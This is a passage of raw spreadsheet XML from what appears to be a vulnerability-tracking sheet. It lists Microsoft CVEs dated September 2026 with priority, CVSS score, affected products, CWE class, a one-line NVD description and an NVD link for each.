s="5" t="inlineStr" /><c r="J293" s="5" t="inlineStr" /><c r="K293" s="5" t="inlineStr" /><c r="L293" s="5" t="inlineStr" /><c r="M293" s="5" t="inlineStr" /><c r="N293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P293" s="5" t="inlineStr" /><c r="Q293" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R293" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t></is></c></row><row r="294"><c r="A294" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C294" s="5" t="inlineStr"><is><t>CVE-2026-69511</t></is></c><c r="D294" s="5" t="n"><v>8.800000000000001</v></c><c r="E294" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F294" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G294" s="5" t="inlineStr" /><c r="H294" s="5" t="n"><v>0.008</v></c><c r="I294" s="5" t="inlineStr" /><c r="J294" s="5" t="inlineStr" /><c r="K294" s="5" t="inlineStr" /><c r="L294" s="5" t="inlineStr" /><c r="M294" s="5" t="inlineStr" /><c r="N294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P294" s="5" t="inlineStr" /><c r="Q294" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R294" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t></is></c></row><row r="295"><c r="A295" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C295" s="5" t="inlineStr"><is><t>CVE-2026-69518</t></is></c><c r="D295" s="5" t="n"><v>8.800000000000001</v></c><c r="E295" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G295" s="5" t="inlineStr" /><c r="H295" s="5" t="n"><v>0.008</v></c><c r="I295" s="5" t="inlineStr" /><c r="J295" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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95" s="5" t="inlineStr" /><c r="M295" s="5" t="inlineStr" /><c r="N295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P295" s="5" t="inlineStr" /><c r="Q295" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R295" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t></is></c></row><row r="296"><c r="A296" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C296" s="5" t="inlineStr"><is><t>CVE-2026-69522</t></is></c><c r="D296" s="5" t="n"><v>8.800000000000001</v></c><c r="E296" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F296" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G296" s="5" t="inlineStr" /><c r="H296" s="5" t="n"><v>0.008</v></c><c r="I296" s="5" t="inlineStr" /><c r="J296" s="5" t="inlineStr" /><c r="K296" s="5" t="inlineStr" /><c r="L296" s="5" t="inlineStr" /><c r="M296" s="5" t="inlineStr" /><c r="N296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P296" s="5" t="inlineStr" /><c r="Q296" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R296" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t></is></c></row><row r="297"><c r="A297" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C297" s="5" t="inlineStr"><is><t>CVE-2026-69529</t></is></c><c r="D297" s="5" t="n"><v>8.800000000000001</v></c><c r="E297" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G297" s="5" t="inlineStr" /><c r="H297" s="5" t="n"><v>0.005</v></c><c r="I297" s="5" t="inlineStr" /><c r="J297" s="5" t="inlineStr" /><c r="K297" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L297" s="5" t="inlineStr" /><c r="M297" s="5" t="inlineStr" /><c r="N297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P297" s="5" t="inlineStr" /><c r="Q297" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R297" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t></is></c></row><row r="298"><c r="A298" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C298" s="5" t="inlineStr"><is><t>CVE-2026-69547</t></is></c><c r="D298" s="5" t="n"><v>8.800000000000001</v></c><c r="E298" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F298" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G298" s="5" t="inlineStr" /><c r="H298" s="5" t="n"><v>0.008999999999999999</v></c><c r="I298" s="5" t="inlineStr" /><c r="J298" s="5" t="inlineStr" /><c r="K298" s="5" t="inlineStr" /><c r="L298" s="5" t="inlineStr" /><c r="M298" s="5" t="inlineStr" /><c r="N298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P298" s="5" t="inlineStr" /><c r="Q298" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R298" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t></is></c></row><row r="299"><c r="A299" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C299" s="5" t="inlineStr"><is><t>CVE-2026-69551</t></is></c><c r="D299" s="5" t="n"><v>8.800000000000001</v></c><c r="E299" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F299" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G299" s="5" t="inlineStr" /><c r="H299" s="5" t="n"><v>0.008999999999999999</v></c><c r="I299" s="5" t="inlineStr" /><c r="J299" s="5" t="inlineStr" /><c r="K299" s="5" t="inlineStr" /><c r="L299" s="5" t="inlineStr" /><c r="M299" s="5" t="inlineStr" /><c r="N299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P299" s="5" t="inlineStr" /><c r="Q299" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R299" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="S299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t></is></c></row><row r="300"><c r="A300" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C300" s="5" t="inlineStr"><is><t>CVE-2026-69556</t></is></c><c r="D300" s="5" t="n"><v>8.800000000000001</v></c><c r="E300" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F300" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G300" s="5" t="inlineStr" /><c r="H300" s="5" t="n"><v>0.008</v></c><c r="I300" s="5" t="inlineStr" /><c r="J300" s="5" t="inlineStr" /><c r="K300" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L300" s="5" t="inlineStr" /><c r="M300" s="5" t="inlineStr" /><c r="N300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P300" s="5" t="inlineStr" /><c r="Q300" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R300" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t></is></c></row><row r="301"><c r="A301" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C301" s="5" t="inlineStr"><is><t>CVE-2026-69598</t></is></c><c r="D301" s="5" t="n"><v>8.800000000000001</v></c><c r="E301" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F301" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G301" s="5" t="inlineStr" /><c r="H301" s="5" t="n"><v>0.008</v></c><c r="I301" s="5" t="inlineStr" /><c r="J301" s="5" t="inlineStr" /><c r="K301" s="5" t="inlineStr" /><c r="L301" s="5" t="inlineStr" /><c r="M301" s="5" t="inlineStr" /><c r="N301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P301" s="5" t="inlineStr" /><c r="Q301" s="5" t="inlineStr"><is><t>CWE-131</t></is></c><c r="R301" s="5" t="inlineStr"><is><t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t></is></c></row><row r="302"><c r="A302" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C302" s="5" t="inlineStr"><is><t>CVE-2026-69601</t></is></c><c r="D302" s="5" t="n"><v>8.800000000000001</v></c><c r="E302" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G302" s="5" t="inlineStr" /><c r="H302" s="5" t="n"><v>0.008</v></c><c r="I302" s="5" t="inlineStr" /><c r="J302" s="5" t="inlineStr" /><c r="K302" s="5" t="inlineStr" /><c r="L302" s="5" t="inlineStr" /><c r="M302" s="5" t="inlineStr" /><c r="N302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P302" s="5" t="inlineStr" /><c r="Q302" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R302" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t></is></c></row><row r="303"><c r="A303" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C303" s="5" t="inlineStr"><is><t>CVE-2026-69603</t></is></c><c r="D303" s="5" t="n"><v>8.800000000000001</v></c><c r="E303" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G303" s="5" t="inlineStr" /><c r="H303" s="5" t="n"><v>0.003</v></c><c r="I303" s="5" t="inlineStr" /><c r="J303" s="5" t="inlineStr" /><c r="K303" s="5" t="inlineStr" /><c r="L303" s="5" t="inlineStr" /><c r="M303" s="5" t="inlineStr" /><c r="N303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P303" s="5" t="inlineStr" /><c r="Q303" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R303" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="S303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t></is></c></row><row r="304"><c r="A304" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C304" s="5" t="inlineStr"><is><t>CVE-2026-69614</t></is></c><c r="D304" s="5" t="n"><v>8.800000000000001</v></c><c r="E304" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F304" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G304" s="5" t="inlineStr" /><c r="H304" s="5" t="n"><v>0.008999999999999999</v></c><c r="I304" s="5" t="inlineStr" /><c r="J304" s="5" t="inlineStr" /><c r="K304" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L304" s="5" t="inlineStr" /><c r="M304" s="5" t="inlineStr" /><c r="N304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P304" s="5" t="inlineStr" /><c r="Q304" s="5" t="inlineStr"><is><t>CWE-121, CWE-20</t></is></c><c r="R304" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t></is></c></row><row r="305"><c r="A305" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C305" s="5" t="inlineStr"><is><t>CVE-2026-69628</t></is></c><c r="D305" s="5" t="n"><v>8.800000000000001</v></c><c r="E305" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F305" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G305" s="5" t="inlineStr" /><c r="H305" s="5" t="n"><v>0.008999999999999999</v></c><c r="I305" s="5" t="inlineStr" /><c r="J305" s="5" t="inlineStr" /><c r="K305" s="5" t="inlineStr" /><c r="L305" s="5" t="inlineStr" /><c r="M305" s="5" t="inlineStr" /><c r="N305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P305" s="5" t="inlineStr" /><c r="Q305" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R305" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t></is></c><c r="S305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t></is></c></row><row r="306"><c r="A306" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C306" s="5" t="inlineStr"><is><t>CVE-2026-69629</t></is></c><c r="D306" s="5" t="n"><v>8.800000000000001</v></c><c r="E306" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F306" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G306" s="5" t="inlineStr" /><c r="H306" s="5" t="n"><v>0.008</v></c><c r="I306" s="5" t="inlineStr" /><c r="J306" s="5" t="inlineStr" /><c r="K306" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L306" s="5" t="inlineStr" /><c r="M306" s="5" t="inlineStr" /><c r="N306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P306" s="5" t="inlineStr" /><c r="Q306" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R306" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t></is></c></row><row r="307"><c r="A307" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C307" s="5" t="inlineStr"><is><t>CVE-2026-69632</t></is></c><c r="D307" s="5" t="n"><v>8.800000000000001</v></c><c r="E307" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F307" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G307" s="5" t="inlineStr" /><c r="H307" s="5" t="n"><v>0.008</v></c><c r="I307" s="5" t="inlineStr" /><c r="J307" s="5" t="inlineStr" /><c r="K307" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L307" s="5" t="inlineStr" /><c r="M307" s="5" t="inlineStr" /><c r="N307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P307" s="5" t="inlineStr" /><c r="Q307" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R307" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t></is></c></row><row r="308"><c r="A308" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C308" s="5" t="inlineStr"><is><t>CVE-2026-69649</t></is></c><c r="D308" s="5" t="n"><v>8.800000000000001</v></c><c r="E308" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G308" s="5" t="inlineStr" /><c r="H308" s="5" t="n"><v>0.008</v></c><c r="I308" s="5" t="inlineStr" /><c r="J308" s="5" t="inlineStr" /><c r="K308" s="5" t="inlineStr" /><c r="L308" s="5" t="inlineStr" /><c r="M308" s="5" t="inlineStr" /><c r="N308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P308" s="5" t="inlineStr" /><c r="Q308" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R308" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t></is></c></row><row r="309"><c r="A309" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C309" s="5" t="inlineStr"><is><t>CVE-2026-69669</t></is></c><c r="D309" s="5" t="n"><v>8.800000000000001</v></c><c r="E309" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F309" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G309" s="5" t="inlineStr" /><c r="H309" s="5" t="n"><v>0.008</v></c><c r="I309" s="5" t="inlineStr" /><c r="J309" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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09" s="5" t="inlineStr" /><c r="M309" s="5" t="inlineStr" /><c r="N309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P309" s="5" t="inlineStr" /><c r="Q309" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R309" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t></is></c></row><row r="310"><c r="A310" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C310" s="5" t="inlineStr"><is><t>CVE-2026-69671</t></is></c><c r="D310" s="5" t="n"><v>8.800000000000001</v></c><c r="E310" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F310" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G310" s="5" t="inlineStr" /><c r="H310" s="5" t="n"><v>0.008</v></c><c r="I310" s="5" t="inlineStr" /><c r="J310" s="5" t="inlineStr" /><c r="K310" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L310" s="5" t="inlineStr" /><c r="M310" s="5" t="inlineStr" /><c r="N310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P310" s="5" t="inlineStr" /><c r="Q310" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R310" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t></is></c></row><row r="311"><c r="A311" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C311" s="5" t="inlineStr"><is><t>CVE-2026-69676</t></is></c><c r="D311" s="5" t="n"><v>8.800000000000001</v></c><c r="E311" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G311" s="5" t="inlineStr" /><c r="H311" s="5" t="n"><v>0.012</v></c><c r="I311" s="5" t="inlineStr" /><c r="J311" s="5" t="inlineStr" /><c r="K311" s="5" t="inlineStr" /><c r="L311" s="5" t="inlineStr" /><c r="M311" s="5" t="inlineStr" /><c r="N311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P311" s="5" t="inlineStr" /><c r="Q311" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="R311" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t></is></c><c r="S311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t></is></c></row><row r="312"><c r="A312" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C312" s="5" t="inlineStr"><is><t>CVE-2026-69678</t></is></c><c r="D312" s="5" t="n"><v>8.800000000000001</v></c><c r="E312" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G312" s="5" t="inlineStr" /><c r="H312" s="5" t="n"><v>0.008</v></c><c r="I312" s="5" t="inlineStr" /><c r="J312" s="5" t="inlineStr" /><c r="K312" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L312" s="5" t="inlineStr" /><c r="M312" s="5" t="inlineStr" /><c r="N312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P312" s="5" t="inlineStr" /><c r="Q312" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R312" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t></is></c></row><row r="313"><c r="A313" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C313" s="5" t="inlineStr"><is><t>CVE-2026-69686</t></is></c><c r="D313" s="5" t="n"><v>8.800000000000001</v></c><c r="E313" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G313" s="5" t="inlineStr" /><c r="H313" s="5" t="n"><v>0.008</v></c><c r="I313" s="5" t="inlineStr" /><c r="J313" s="5" t="inlineStr" /><c r="K313" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L313" s="5" t="inlineStr" /><c r="M313" s="5" t="inlineStr" /><c r="N313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P313" s="5" t="inlineStr" /><c r="Q313" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R313" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t></is></c></row><row r="314"><c r="A314" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C314" s="5" t="inlineStr"><is><t>CVE-2026-69712</t></is></c><c r="D314" s="5" t="n"><v>8.800000000000001</v></c><c r="E314" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G314" s="5" t="inlineStr" /><c r="H314" s="5" t="n"><v>0.008999999999999999</v></c><c r="I314" s="5" t="inlineStr" /><c r="J314" s="5" t="inlineStr" /><c r="K314" s="5" t="inlineStr" /><c r="L314" s="5" t="inlineStr" /><c r="M314" s="5" t="inlineStr" /><c r="N314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P314" s="5" t="inlineStr" /><c r="Q314" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R314" s="5" t="inlineStr"><is><t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t></is></c><c r="S314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t></is></c></row><row r="315"><c r="A315" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C315" s="5" t="inlineStr"><is><t>CVE-2026-69716</t></is></c><c r="D315" s="5" t="n"><v>8.800000000000001</v></c><c r="E315" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G315" s="5" t="inlineStr" /><c r="H315" s="5" t="n"><v>0.008999999999999999</v></c><c r="I315" s="5" t="inlineStr" /><c r="J315" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K315" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L315" s="5" t="inlineStr" /><c r="M315" s="5" t="inlineStr" /><c r="N315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P315" s="5" t="inlineStr" /><c r="Q315" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R315" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t></is></c></row><row r="316"><c r="A316" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C316" s="5" t="inlineStr"><is><t>CVE-2026-69722</t></is></c><c r="D316" s="5" t="n"><v>8.800000000000001</v></c><c r="E316" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F316" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G316" s="5" t="inlineStr" /><c r="H316" s="5" t="n"><v>0.008</v></c><c r="I316" s="5" t="inlineStr" /><c r="J316" s="5" t="inlineStr" /><c r="K316" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L316" s="5" t="inlineStr" /><c r="M316" s="5" t="inlineStr" /><c r="N316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P316" s="5" t="inlineStr" /><c r="Q316" s="5" 